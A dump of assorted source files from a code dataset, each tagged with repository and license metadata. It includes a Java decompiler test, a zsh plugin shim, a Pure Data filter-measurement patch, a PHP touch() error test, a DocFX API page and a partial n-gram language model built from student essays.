Control7=IDCANCEL,button,1342242816
Control8=IDC_STATIC,static,1342308352
Control9=IDC_STATIC,static,1342308352
Control10=IDC_STATIC,static,1342308352
Control11=IDC_STATIC,static,1342308352
[CLS:CUpdateSettings]
Type=0
HeaderFile=UpdateSettings.h
ImplementationFile=UpdateSettings.cpp
BaseClass=CDialog
Filter=D
VirtualFilter=dWC
LastObject=IDC_EDIT1
[TB:IDR_MAINFRAME]
Type=1
Class=?
Command1=ID_FILE_NEW
Command2=ID_FILE_OPEN
Command3=ID_FILE_SAVE
Command4=ID_EDIT_CUT
Command5=ID_EDIT_COPY
Command6=ID_EDIT_PASTE
Command7=ID_FILE_PRINT
Command8=ID_DOCUMENT_OPTIONS
Command9=ID_DOCUMENT_BUILD
Command10=ID_DOCUMENT_BUILDSELECTED
Command11=ID_DOCUMENT_BUILDALL
Command12=ID_VERSIONCONTROL_CHECKOUT
Command13=ID_VERSIONCONTROL_CHECKIN
Command14=ID_VERSIONCONTROL_UNCHECK
Command15=ID_TREE_CREATE
Command16=ID_TREE_DELETE
Command17=ID_PORTS_DELETE
Command18=ID_PORTS_PROPERTIES
Command19=ID_PORTS_SHELLOPEN
Command20=ID_APP_ABOUT
CommandCount=20
| Clarion | 3 | CarysT/medusa | Tools/Resourcer/Resourcer.clw | [
"MIT"
] |
package jadx.tests.integration.inline;
import org.junit.jupiter.api.Test;
import jadx.core.dex.nodes.ClassNode;
import jadx.tests.api.IntegrationTest;
import static jadx.tests.api.utils.JadxMatchers.containsOne;
import static org.hamcrest.CoreMatchers.containsString;
import static org.hamcrest.CoreMatchers.not;
import static org.hamcrest.MatcherAssert.assertThat;
public class TestConstInline extends IntegrationTest {
public static class TestCls {
public boolean test() {
try {
return f(0);
} catch (Exception e) {
return false;
}
}
public boolean f(int i) {
return true;
}
}
@Test
public void test() {
ClassNode cls = getClassNode(TestCls.class);
String code = cls.getCode().toString();
assertThat(code, containsOne("return f(0);"));
assertThat(code, containsOne("return false;"));
assertThat(code, not(containsString(" = ")));
}
}
| Java | 4 | DSYliangweihao/jadx | jadx-core/src/test/java/jadx/tests/integration/inline/TestConstInline.java | [
"Apache-2.0"
] |
echo ${(%):-'%F{yellow}The `%Bcopydir%b` plugin is deprecated. Use the `%Bcopypath%b` plugin instead.%f'}
source "$ZSH/plugins/copypath/copypath.plugin.zsh"
# TODO: 2022-02-22: Remove deprecated copydir function.
function copydir {
copypath
}
| Shell | 3 | residwi/ohmyzsh | plugins/copydir/copydir.plugin.zsh | [
"MIT"
] |
#N canvas 439 23 868 734 12;
#X obj 294 267 *~;
#X obj 365 265 *~;
#X obj 229 342 t b b;
#X obj 437 468 atan2;
#X obj 294 378 snapshot~;
#X obj 388 377 snapshot~;
#X obj 481 335 butterworth3~ 80 100000 0;
#X obj 69 207 inlet;
#X obj 437 496 expr $f1 + 6.283 * ($f1 < -0.01);
#X obj 101 503 t b f b;
#X obj 517 576 symbol \$2;
#X obj 591 576 symbol;
#X obj 517 546 t b b, f 7;
#X msg 517 631 0;
#X msg 591 631 1;
#X obj 517 603 sel symbol, f 11;
#X floatatom 517 662 5 0 0 0 - - -;
#X obj 240 609 f;
#X obj 294 211 inlet~;
#X obj 365 211 inlet~;
#X obj 446 210 inlet~;
#X obj 403 611 f;
#X obj 397 568 spigot;
#X obj 329 611 t f b;
#X obj 166 609 t f b;
#X obj 166 637 tabwrite \$1;
#X obj 329 647 tabwrite \$2;
#X obj 671 335 env~ 2048;
#X obj 360 438 f;
#X obj 294 400 t f f b;
#X obj 360 468 dbtopow;
#X obj 166 497 expr sqrt($f1*$f1 + $f2*$f2)/$f3;
#X obj 69 330 sel 0;
#X obj 101 360 - 1;
#X obj 69 232 unpack;
#X obj 175 233 expr 10000/$f1;
#X text 295 159 test sinusoid:;
#X text 301 192 cos;
#X text 372 191 sin;
#X text 442 169 output of filter;
#X text 444 185 we're testing;
#X text 69 160 index and time to next step;
#X text 77 129 ----- from filter-graph1's 3 outlets: -------;
#X obj 437 436 swap;
#X obj 653 291 t b;
#X text 617 256 clear filters;
#X text 616 270 to start;
#X text 647 568 check if any table;
#X text 646 583 is specified for phase;
#X text 646 599 (don't compute it if;
#X text 647 614 not.);
#X text 53 30 filter-graph2: measures frequency and phase response
of a filter \, which should be driven by a "filter-graph1" object.
We need the three outputs of filter-graph1 \, plus the filter output.
, f 64;
#X text 518 99 1: table name for frequency response;
#X text 597 78 creation arguments:;
#X text 518 115 2 (optional): table name for phase response;
#X obj 294 336 butterworth3~ 80 100000 0;
#X obj 478 429 * -1;
#X floatatom 221 278 5 0 0 0 - - -;
#X text 101 274 cutoff freq. for low-pass filters, f 16;
#X connect 0 0 55 0;
#X connect 1 0 6 0;
#X connect 2 0 4 0;
#X connect 2 1 5 0;
#X connect 3 0 8 0;
#X connect 4 0 29 0;
#X connect 5 0 31 1;
#X connect 5 0 56 0;
#X connect 6 0 5 0;
#X connect 7 0 34 0;
#X connect 8 0 22 0;
#X connect 9 0 2 0;
#X connect 9 1 17 1;
#X connect 9 1 21 1;
#X connect 9 2 12 0;
#X connect 10 0 15 0;
#X connect 11 0 15 1;
#X connect 12 0 10 0;
#X connect 12 1 11 0;
#X connect 13 0 16 0;
#X connect 14 0 16 0;
#X connect 15 0 13 0;
#X connect 15 1 14 0;
#X connect 16 0 22 1;
#X connect 17 0 25 1;
#X connect 18 0 0 0;
#X connect 18 0 27 0;
#X connect 19 0 1 0;
#X connect 20 0 1 1;
#X connect 20 0 0 1;
#X connect 21 0 26 1;
#X connect 22 0 23 0;
#X connect 23 0 26 0;
#X connect 23 1 21 0;
#X connect 24 0 25 0;
#X connect 24 1 17 0;
#X connect 27 0 28 1;
#X connect 28 0 30 0;
#X connect 29 0 31 0;
#X connect 29 1 43 0;
#X connect 29 2 28 0;
#X connect 30 0 31 2;
#X connect 31 0 24 0;
#X connect 32 1 33 0;
#X connect 32 1 44 0;
#X connect 33 0 9 0;
#X connect 34 0 32 0;
#X connect 34 1 35 0;
#X connect 35 0 57 0;
#X connect 43 0 3 0;
#X connect 43 1 3 1;
#X connect 44 0 6 4;
#X connect 44 0 55 4;
#X connect 55 0 4 0;
#X connect 56 0 43 1;
#X connect 57 0 55 1;
#X connect 57 0 6 1;
| Pure Data | 4 | mxa/pure-data | doc/3.audio.examples/filter-graph2.pd | [
"TCL"
] |
--TEST--
touch() error tests
--CREDITS--
Dave Kelsey <d_kelsey@uk.ibm.com>
--FILE--
<?php
var_dump(touch("/no/such/file/or/directory"));
?>
--EXPECTF--
Warning: touch(): Unable to create file /no/such/file/or/directory because No such file or directory in %s on line %d
bool(false)
| PHP | 3 | thiagooak/php-src | ext/standard/tests/file/touch_error.phpt | [
"PHP-3.01"
] |
<!DOCTYPE html>
<!--[if IE]><![endif]-->
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Interface IEndState
</title>
<meta name="viewport" content="width=device-width">
<meta name="title" content="Interface IEndState
">
<meta name="generator" content="docfx 2.56.2.0">
<link rel="shortcut icon" href="../favicon.ico">
<link rel="stylesheet" href="../styles/docfx.vendor.css">
<link rel="stylesheet" href="../styles/docfx.css">
<link rel="stylesheet" href="../styles/main.css">
<meta property="docfx:navrel" content="../toc.html">
<meta property="docfx:tocrel" content="toc.html">
</head>
<body data-spy="scroll" data-target="#affix" data-offset="120">
<div id="wrapper">
<header>
<nav id="autocollapse" class="navbar navbar-inverse ng-scope" role="navigation">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#navbar">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="../index.html">
<img id="logo" class="svg" src="../logo.svg" alt="">
</a>
</div>
<div class="collapse navbar-collapse" id="navbar">
<form class="navbar-form navbar-right" role="search" id="search">
<div class="form-group">
<input type="text" class="form-control" id="search-query" placeholder="Search" autocomplete="off">
</div>
</form>
</div>
</div>
</nav>
<div class="subnav navbar navbar-default">
<div class="container hide-when-search" id="breadcrumb">
<ul class="breadcrumb">
<li></li>
</ul>
</div>
</div>
</header>
<div role="main" class="container body-content hide-when-search">
<div class="sidenav hide-when-search">
<a class="btn toc-toggle collapse" data-toggle="collapse" href="#sidetoggle" aria-expanded="false" aria-controls="sidetoggle">Show / Hide Table of Contents</a>
<div class="sidetoggle collapse" id="sidetoggle">
<div id="sidetoc"></div>
</div>
</div>
<div class="article row grid-right">
<div class="col-md-10">
<article class="content wrap" id="_content" data-uid="alps_.net_api.IEndState">
<h1 id="alps__net_api_IEndState" data-uid="alps_.net_api.IEndState" class="text-break">Interface IEndState
</h1>
<div class="markdown level0 summary"><p sourcefile="obj/api/alps_.net_api.IEndState.yml" sourcestartlinenumber="2" sourceendlinenumber="2">Interface to the EndState class</p>
</div>
<div class="markdown level0 conceptual"></div>
<div class="inheritedMembers">
<h5>Inherited Members</h5>
<div>
<a class="xref" href="alps_.net_api.IState.html#alps__net_api_IState_setIncomingTransition_alps__net_api_ITransition_">IState.setIncomingTransition(ITransition)</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IState.html#alps__net_api_IState_getIncomingTransition">IState.getIncomingTransition()</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IState.html#alps__net_api_IState_setOutgoingTransition_alps__net_api_ITransition_">IState.setOutgoingTransition(ITransition)</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IState.html#alps__net_api_IState_getOutgoingTransition">IState.getOutgoingTransition()</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IState.html#alps__net_api_IState_setFunctionSpecification_alps__net_api_IFunctionSpecification_">IState.setFunctionSpecification(IFunctionSpecification)</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IState.html#alps__net_api_IState_getFunctionSpecification">IState.getFunctionSpecification()</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IState.html#alps__net_api_IState_setGuardBehavior_alps__net_api_IGuardBehavior_">IState.setGuardBehavior(IGuardBehavior)</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IState.html#alps__net_api_IState_getGuardBehavior">IState.getGuardBehavior()</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IState.html#alps__net_api_IState_setAction_alps__net_api_IAction_">IState.setAction(IAction)</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IState.html#alps__net_api_IState_getAction">IState.getAction()</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IBehaviorDescriptionComponent.html#alps__net_api_IBehaviorDescriptionComponent_setBelongsToSubjectBehavior_alps__net_api_ISubjectBehavior_">IBehaviorDescriptionComponent.setBelongsToSubjectBehavior(ISubjectBehavior)</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IBehaviorDescriptionComponent.html#alps__net_api_IBehaviorDescriptionComponent_getSubjectBehavior">IBehaviorDescriptionComponent.getSubjectBehavior()</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IPASSProcessModellElement.html#alps__net_api_IPASSProcessModellElement_setAdditionalAttribute_System_Collections_Generic_List_System_String__">IPASSProcessModellElement.setAdditionalAttribute(List<String>)</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IPASSProcessModellElement.html#alps__net_api_IPASSProcessModellElement_getAdditionalAttribute">IPASSProcessModellElement.getAdditionalAttribute()</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IPASSProcessModellElement.html#alps__net_api_IPASSProcessModellElement_setModelComponentID_System_String_">IPASSProcessModellElement.setModelComponentID(String)</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IPASSProcessModellElement.html#alps__net_api_IPASSProcessModellElement_getModelComponentID">IPASSProcessModellElement.getModelComponentID()</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IPASSProcessModellElement.html#alps__net_api_IPASSProcessModellElement_setModelComponentLabel_System_Collections_Generic_List_System_String__">IPASSProcessModellElement.setModelComponentLabel(List<String>)</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IPASSProcessModellElement.html#alps__net_api_IPASSProcessModellElement_getModelComponentLabel">IPASSProcessModellElement.getModelComponentLabel()</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IPASSProcessModellElement.html#alps__net_api_IPASSProcessModellElement_setComment_System_String_">IPASSProcessModellElement.setComment(String)</a>
</div>
<div>
<a class="xref" href="alps_.net_api.IPASSProcessModellElement.html#alps__net_api_IPASSProcessModellElement_getComment">IPASSProcessModellElement.getComment()</a>
</div>
</div>
<h6><strong>Namespace</strong>: <a class="xref" href="alps_.net_api.html">alps_.net_api</a></h6>
<h6><strong>Assembly</strong>: alps.net_api.dll</h6>
<h5 id="alps__net_api_IEndState_syntax">Syntax</h5>
<div class="codewrapper">
<pre><code class="lang-csharp hljs">public interface IEndState : IState, IBehaviorDescriptionComponent, IPASSProcessModellElement, IOwlThing</code></pre>
</div>
<h3 id="methods">Methods
</h3>
<a id="alps__net_api_IEndState_factoryMethod_" data-uid="alps_.net_api.IEndState.factoryMethod*"></a>
<h4 id="alps__net_api_IEndState_factoryMethod" data-uid="alps_.net_api.IEndState.factoryMethod">factoryMethod()</h4>
<div class="markdown level1 summary"></div>
<div class="markdown level1 conceptual"></div>
<h5 class="decalaration">Declaration</h5>
<div class="codewrapper">
<pre><code class="lang-csharp hljs">EndState factoryMethod()</code></pre>
</div>
<h5 class="returns">Returns</h5>
<table class="table table-bordered table-striped table-condensed">
<thead>
<tr>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><a class="xref" href="alps_.net_api.EndState.html">EndState</a></td>
<td></td>
</tr>
</tbody>
</table>
<a id="alps__net_api_IEndState_getBelongsToAction_" data-uid="alps_.net_api.IEndState.getBelongsToAction*"></a>
<h4 id="alps__net_api_IEndState_getBelongsToAction" data-uid="alps_.net_api.IEndState.getBelongsToAction">getBelongsToAction()</h4>
<div class="markdown level1 summary"></div>
<div class="markdown level1 conceptual"></div>
<h5 class="decalaration">Declaration</h5>
<div class="codewrapper">
<pre><code class="lang-csharp hljs">IAction getBelongsToAction()</code></pre>
</div>
<h5 class="returns">Returns</h5>
<table class="table table-bordered table-striped table-condensed">
<thead>
<tr>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><a class="xref" href="alps_.net_api.IAction.html">IAction</a></td>
<td></td>
</tr>
</tbody>
</table>
<a id="alps__net_api_IEndState_setBelongsToAction_" data-uid="alps_.net_api.IEndState.setBelongsToAction*"></a>
<h4 id="alps__net_api_IEndState_setBelongsToAction_alps__net_api_IAction_" data-uid="alps_.net_api.IEndState.setBelongsToAction(alps_.net_api.IAction)">setBelongsToAction(IAction)</h4>
<div class="markdown level1 summary"></div>
<div class="markdown level1 conceptual"></div>
<h5 class="decalaration">Declaration</h5>
<div class="codewrapper">
<pre><code class="lang-csharp hljs">void setBelongsToAction(IAction action)</code></pre>
</div>
<h5 class="parameters">Parameters</h5>
<table class="table table-bordered table-striped table-condensed">
<thead>
<tr>
<th>Type</th>
<th>Name</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><a class="xref" href="alps_.net_api.IAction.html">IAction</a></td>
<td><span class="parametername">action</span></td>
<td></td>
</tr>
</tbody>
</table>
</article>
</div>
<div class="hidden-sm col-md-2" role="complementary">
<div class="sideaffix">
<div class="contribution">
<ul class="nav">
</ul>
</div>
<nav class="bs-docs-sidebar hidden-print hidden-xs hidden-sm affix" id="affix">
<!-- <p><a class="back-to-top" href="#top">Back to top</a><p> -->
</nav>
</div>
</div>
</div>
</div>
<footer>
<div class="grad-bottom"></div>
<div class="footer">
<div class="container">
<span class="pull-right">
<a href="#top">Back to top</a>
</span>
<span>Generated by <strong>DocFX</strong></span>
</div>
</div>
</footer>
</div>
<script type="text/javascript" src="../styles/docfx.vendor.js"></script>
<script type="text/javascript" src="../styles/docfx.js"></script>
<script type="text/javascript" src="../styles/main.js"></script>
</body>
</html>
| Myghty | 3 | NicoBaumann454/alsp.net.api | alps .net api/obj/.cache/build/eiochz4x.muz/lvf1wek3.myt | [
"MIT"
] |
\data\
ngram 1=2768
ngram 2=12182
ngram 3=18284
\1-grams:
-4.1183567 <unk> 0
0 <s> -0.63579637
-3.4271748 </s> 0
-2.4996314 I -0.2709696
-3.8506508 disagree -0.14086568
-2.174265 with -0.2945207
-2.511044 this -0.16834387
-3.5348082 statement -0.14589529
-1.9226898 for -0.3749427
-3.153469 several -0.18439111
-2.8938322 reasons -0.3760948
-1.426225 . -2.5361726
-3.9746375 While -0.098042734
-2.219103 it -0.3107041
-2.269109 can -0.31470096
-2.5472004 be -0.18867591
-3.9746375 argued -0.098042734
-1.9633206 that -0.36922604
-2.8413033 having -0.38809296
-1.8339452 a -0.33833933
-2.4177468 part-time -0.55441916
-2.645509 job -0.26853126
-1.9732625 is -0.3179428
-2.8938322 valuable -0.14450517
-3.5348082 preparation -0.47831634
-3.340989 full-time -0.098042734
-1.7727894 the -0.2817252
-2.7136247 student -0.2349929
-2.3569138 will -0.2810348
-3.678229 acquire -0.098042734
-3.1054616 upon -0.2741496
-3.340989 graduation -0.2548424
-1.4526992 , -0.46682543
-2.866774 often -0.12548718
-2.4085171 not -0.22340627
-3.5348082 case -0.13342881
-3.8506508 In -0.10741108
-2.7136247 many -0.17417175
-3.2691073 cases -0.17496733
-2.817244 any -0.16434178
-2.9536004 employment -0.23850599
-3.678229 obtained -0.17195599
-2.4177468 by -0.24772288
-1.7878366 in -0.41475922
-2.8938322 field -0.51152325
-1.6439362 and -0.21729526
-1.6765372 of -0.36378208
-3.4271748 nature -0.14086568
-3.340989 completely -0.098042734
-3.678229 unrelated -0.17195599
-1.6063511 to -0.40661365
-2.0663714 their -0.2614526
-3.678229 chosen -0.1281937
-3.2074509 course -0.15613267
-2.645509 study -0.22778022
-3.9746375 For -0.098042734
-3.8506508 example -0.13342881
-2.7727888 studying -0.26001975
-3.5348082 engineering -0.098042734
-2.6955683 has -0.27701992
-2.817244 very -0.16373841
-3.2074509 little -0.098042734
-2.511044 experience -0.28569293
-3.340989 gain -0.16288683
-2.3035645 from -0.26378733
-2.427177 working -0.31814906
-2.179623 as -0.33811408
-3.9746375 waiter -0.098042734
-3.2691073 restaurant -0.14784537
-3.9746375 Moreover -0.098042734
-2.817244 there -0.33824086
-3.8506508 ample -0.098042734
-2.9536004 reason -0.23492767
-2.1637433 students -0.45364022
-3.678229 engage -0.35337758
-3.9746375 Such -0.098042734
-3.8506508 mean -0.098042734
-3.678229 considerable -0.098042734
-3.340989 amount -0.6544076
-3.340989 additional -0.20720947
-3.340989 stress -0.13342881
-2.174265 on -0.36171323
-3.8506508 top -0.21423665
-3.9746375 created -0.098042734
-2.9536004 studies -0.27414817
-3.9746375 The -0.098042734
-2.6150792 also -0.1678165
-3.9746375 increased -0.098042734
-3.0229268 less -0.12430835
-2.3569138 time -0.35682118
-3.1054616 available -0.2964432
-3.9746375 accomplish -0.098042734
-3.9746375 Additionally -0.098042734
-2.6300275 jobs -0.24673419
-3.5348082 leave -0.098042734
-2.559954 one -0.2572041
-3.4271748 tired -0.14086568
-3.8506508 thus -0.098042734
-3.5348082 unable -0.47831634
-3.153469 focus -0.19507152
-3.8506508 effectively -0.098042734
-2.678233 ? -1.008282
-3.8506508 resulting -0.098042734
-3.8506508 lower -0.098042734
-3.5348082 quality -0.1522653
-2.7324646 school -0.27006212
-2.2560573 work -0.34280708
-3.0622365 being -0.12611718
-3.9746375 produced -0.098042734
-3.9746375 Therefore -0.098042734
-2.7136247 if -0.33696187
-3.0622365 related -0.57519233
-3.2074509 f -0.098042734
-3.8506508 found -0.098042734
-2.678233 -LRB- -0.12223055
-2.6150792 such -0.35941598
-2.5472004 an -0.14576791
-3.9746375 internship -0.098042734
-2.645509 -RRB- -0.27277613
-2.9868817 then -0.11401739
-2.5866425 may -0.2907103
-3.9746375 worth -0.098042734
-3.4271748 pursuing -0.098042734
-2.9536004 but -0.17043503
-3.8506508 otherwise -0.098042734
-2.4885108 should -0.35904452
-2.794448 only -0.15665703
-3.9746375 sought -0.098042734
-3.153469 necessary -0.19507152
-2.922689 financial -0.13703011
-3.9746375 i.e. -0.098042734
-3.2074509 pay -0.22503476
-3.153469 tuition -0.18922512
-3.340989 fees -0.22739327
-3.9746375 Yes -0.098042734
-3.340989 agree -0.33653778
-2.269109 college -0.44256377
-2.4085171 have -0.30732065
-3.9746375 Time -0.098042734
-2.559954 money -0.36377907
-2.2825649 they -0.39242604
-3.340989 say -0.20720947
-3.9746375 And -0.098042764
-2.7727888 you -0.17147988
-3.1054616 extra -0.271326
-3.2691073 making -0.18983142
-2.6150792 some -0.23380876
-2.661563 so -0.20789708
-3.153469 bad -0.14589529
-3.5348082 following -0.12131027
-3.0229268 : -0.11285661
-3.5348082 - -0.098042734
-3.678229 To -0.115375474
-3.4271748 begin -0.20720947
-3.2691073 today -0.12430835
-3.153469 's -0.116145
-3.8506508 market -0.098042734
-3.1054616 become -0.12322667
-3.5348082 highly -0.098042734
-3.8506508 competitive -0.098042734
-2.817244 most -0.1802425
-3.340989 degree -0.12131027
-3.2691073 does -0.1281937
-3.8506508 guarantee -0.098042734
-2.2017417 or -0.1551769
-3.8506508 pays -0.098042734
-2.8413033 well -0.22909641
-3.9746375 Most -0.098042734
-3.9746375 advertisements -0.098042734
-3.8506508 appear -0.098042734
-3.9746375 newspapers -0.098042734
-3.9746375 on-line -0.098042734
-3.9746375 portals -0.098042734
-3.8506508 preferred -0.098042734
-3.8506508 candidates -0.098042734
-2.8413033 even -0.14589529
-3.9746375 entry -0.098042734
-3.340989 level -0.20720947
-3.340989 positions -0.1281937
-2.2625341 are -0.2012413
-3.8506508 As -0.14086568
-3.5348082 ways -0.098042734
-3.0622365 career -0.22583756
-3.9746375 oriented -0.098042734
-3.5348082 internships -0.098042734
-3.4271748 practical -0.098042734
-3.2074509 experiences -0.17723958
-3.9746375 Another -0.098042734
-3.9746375 option -0.098042734
-3.9746375 Part-time -0.098042734
-3.2074509 offer -0.12131027
-3.2074509 benefits -0.12430835
-3.9746375 Primarily -0.098042734
-3.2691073 benefit -0.14589529
-3.9746375 Apart -0.098042734
-2.559954 part -0.73008823
-3.9746375 lays -0.098042734
-3.8506508 foundation -0.17195599
-3.8506508 history -0.098042734
-3.0622365 future -0.20006908
-3.5348082 carefully -0.098042734
-3.4271748 consider -0.1281937
-3.9746375 select -0.098042734
-3.8506508 order -0.21423665
-3.5348082 skill -0.1522653
-3.8506508 By -0.12430835
-3.9746375 selecting -0.098042734
-3.9746375 gaps -0.098042734
-3.0622365 academic -0.13560295
-3.8506508 qualification -0.098042734
-3.9746375 minimized -0.098042734
-2.8938322 ; -0.16036421
-3.2074509 makes -0.26010817
-3.8506508 candidate -0.098042734
-2.4670892 more -0.15903787
-3.9746375 attractive -0.098042734
-3.340989 potential -0.098042734
-3.1054616 employers -0.118926615
-3.2691073 helps -0.1522653
-2.9536004 better -0.116986044
-3.2691073 understanding -0.30636662
-3.4271748 whether -0.13342881
-3.9746375 corporate -0.098042734
-3.5348082 organization -0.098042734
-3.8506508 hotel -0.098042734
-3.678229 industry -0.098042734
-3.9746375 evolve -0.098042734
-2.5348108 skills -0.3170925
-2.678233 important -0.3392031
-3.678229 employer -0.098042734
-3.9746375 These -0.098042734
-3.678229 include -0.098042734
-3.8506508 leadership -0.21423665
-3.8506508 commitment -0.21423665
-3.8506508 team -0.098042734
-3.9746375 spirit -0.098042734
-3.8506508 interpersonal -0.098042734
-3.5348082 management -0.18983142
-3.1054616 taking -0.24834287
-3.9746375 criticism -0.098042734
-3.9746375 positively -0.098042734
-3.9746375 Besides -0.098042734
-3.2691073 knowledge -0.24782339
-3.678229 gained -0.098042734
-2.866774 through -0.1740617
-3.340989 educational -0.098042734
-2.7136247 who -0.23004654
-3.340989 productive -0.098042734
-3.4271748 developed -0.098042734
-3.8506508 overall -0.098042734
-3.678229 personality -0.17195599
-3.153469 able -0.8304989
-3.9746375 assimilate -0.098042734
-2.866774 themselves -0.16573042
-2.7136247 into -0.24834287
-3.0622365 environment -0.098042734
-3.340989 learned -0.12430835
-3.340989 position -0.17723958
-3.9746375 expand -0.098042734
-3.5348082 increase -0.1522653
-3.678229 abilities -0.098042734
-2.3035645 at -0.35974315
-3.8506508 same -0.098042734
-3.9746375 benefiting -0.098042734
-3.2074509 financially -0.14589529
-3.9746375 There -0.098042734
-3.2691073 two -0.33214822
-2.9868817 first -0.1447969
-3.340989 issue -0.18983142
-3.8506508 Many -0.115375474
-3.9746375 complain -0.098042734
-3.4271748 don -0.45026425
-3.153469 ft -0.12271854
-2.866774 enough -0.19867742
-2.9868817 spend -0.2253515
-3.2691073 food -0.14920501
-3.4271748 times -0.14086568
-3.9746375 Having -0.098042734
-3.2074509 gives -0.20895563
-2.866774 need -0.30885217
-3.9746375 emergency -0.098042734
-3.9746375 Saving -0.098042734
-3.678229 earned -0.14086568
-2.8938322 good -0.11466875
-3.153469 idea -0.34725833
-3.9746375 alternative -0.098042734
-3.9746375 asking -0.098042734
-3.2074509 others -0.17195599
-3.0229268 like -0.13847902
-2.8938322 parents -0.19664675
-3.1054616 friends -0.28161559
-3.9746375 However -0.098042734
-2.922689 doing -0.17161582
-3.678229 again -0.098042734
-3.4271748 put -0.098042734
-3.9746375 strains -0.098042734
-3.4271748 relationships -0.1605951
-2.522765 people -0.20933177
-3.8506508 borrowed -0.21423665
-3.9746375 They -0.098042734
-3.4271748 eventually -0.098042734
-3.340989 see -0.098042764
-3.9746375 evampire -0.098042734
-3.9746375 f. -0.098042734
-3.8506508 This -0.10566091
-3.340989 especially -0.13342881
-3.340989 true -0.098042734
-3.5348082 College -0.14589529
-3.678229 show -0.098042734
-3.678229 fre -0.098042734
-3.8506508 putting -0.098042734
-3.5348082 effort -0.098042734
-3.8506508 keeping -0.098042734
-3.8506508 stable -0.098042734
-3.9746375 People -0.098042734
-3.8506508 willing -0.21423665
-2.9868817 help -0.23529968
-2.511044 when -0.33111084
-3.8506508 trying -0.21423665
-2.7324646 do -0.258052
-3.2691073 something -0.2100067
-3.0229268 your -0.14409229
-3.4271748 earn -0.14589529
-2.9868817 other -0.12005409
-2.8413033 while -0.3406869
-3.9746375 Of -0.098042734
-3.5348082 major -0.098042734
-3.9746375 advantage -0.098042734
-3.8506508 teaching -0.098042734
-3.0229268 take -0.14324087
-3.9746375 tutoring -0.098042734
-2.9868817 high -0.25890478
-3.4271748 chance -0.20720947
-3.153469 use -0.14086568
-3.9746375 theories -0.098042734
-3.9746375 practices -0.098042734
-2.922689 classes -0.19090188
-3.678229 fll -0.098042734
-3.2074509 know -0.13679342
-2.661563 what -0.21927345
-3.8506508 works -0.098042734
-3.9746375 doesn -0.098042734
-3.678229 ft. -0.35337758
-2.7136247 could -0.19622515
-3.8506508 expanding -0.21423665
-3.9746375 horizons -0.098042734
-3.8506508 increasing -0.098042734
-3.678229 opportunities -0.098042734
-2.7727888 after -0.42475128
-3.9746375 conclusion -0.098042734
-3.5348082 encourage -0.098042734
-2.4996314 all -0.22485438
-2.7521589 because -0.31599462
-3.2074509 opportunity -0.37108302
-2.511044 them -0.2832598
-3.9746375 present -0.098042734
-3.9746375 situations -0.098042734
-3.9746375 futures -0.098042734
-3.1054616 Japanese -0.22962537
-3.678229 distractions -0.17195599
-3.2074509 real -0.13060203
-3.4271748 therefore -0.098042734
-3.0622365 provide -0.15665703
-3.153469 useful -0.14589529
-2.9868817 society -0.23463899
-3.8506508 specialized -0.098042734
-3.9746375 Workers -0.098042734
-3.678229 expected -0.35337758
-3.9746375 function -0.098042734
-3.9746375 broad -0.098042734
-3.8506508 range -0.21423665
-3.9746375 contexts -0.098042734
-3.9746375 Evaluations -0.098042734
-2.8938322 must -0.2078073
-3.9746375 familiar -0.098042734
-3.340989 done -0.12430835
-3.678229 area -0.1522653
-3.9746375 specialty -0.098042734
-3.9746375 If -0.098042734
-3.4271748 n't -0.098042734
-3.4271748 whatever -0.14086568
-3.340989 might -0.13342881
-3.8506508 produce -0.098042734
-3.678229 fit -0.1522653
-3.9746375 Neither -0.098042734
-3.8506508 nor -0.098042734
-3.9746375 Learning -0.098042734
-3.4271748 itself -0.098042734
-3.9746375 Because -0.098042734
-3.9746375 external -0.098042734
-3.8506508 subject -0.098042734
-3.8506508 interfere -0.21423665
-3.5348082 grades -0.14086568
-3.9746375 specialization -0.098042734
-3.9746375 It -0.098042734
-3.340989 usually -0.098042734
-3.678229 menial -0.098042734
-3.9746375 specialist -0.098042734
-3.9746375 useless -0.098042734
-2.8413033 get -0.23702982
-3.8506508 fields -0.098042734
-3.9746375 Internships -0.098042734
-3.678229 relevant -0.098042734
-3.5348082 another -0.098042734
-3.8506508 source -0.21423665
-3.8506508 temptation -0.21423665
-3.4271748 colleges -0.098042734
-3.340989 club -0.13342881
-2.9536004 activities -0.16798685
-3.9746375 socialize -0.098042734
-3.8506508 sufficient -0.098042734
-3.2074509 teach -0.098042734
-2.8938322 how -0.32529625
-3.9746375 behave -0.098042734
-3.2691073 away -0.5172111
-3.2691073 give -0.16397229
-3.9746375 unstructured -0.098042734
-2.7324646 social -0.17316
-3.9746375 unpredictable -0.098042734
-3.9746375 results -0.098042734
-3.9746375 unwilling -0.098042734
-3.5348082 fellow -0.274173
-3.8506508 teachers -0.098042734
-3.9746375 unworthy -0.098042734
-3.9746375 finely -0.098042734
-3.9746375 honed -0.098042734
-3.2691073 workers -0.098042764
-3.678229 demands -0.098042734
-3.8506508 strongly -0.098042734
-3.2691073 believe -0.24114136
-2.794448 fs -0.12210803
-3.678229 main -0.14589529
-3.9746375 lot -0.098042734
-2.559954 life -0.31104797
-3.2691073 entering -0.17723958
-3.9746375 workforce -0.098042734
-3.678229 prior -0.17195599
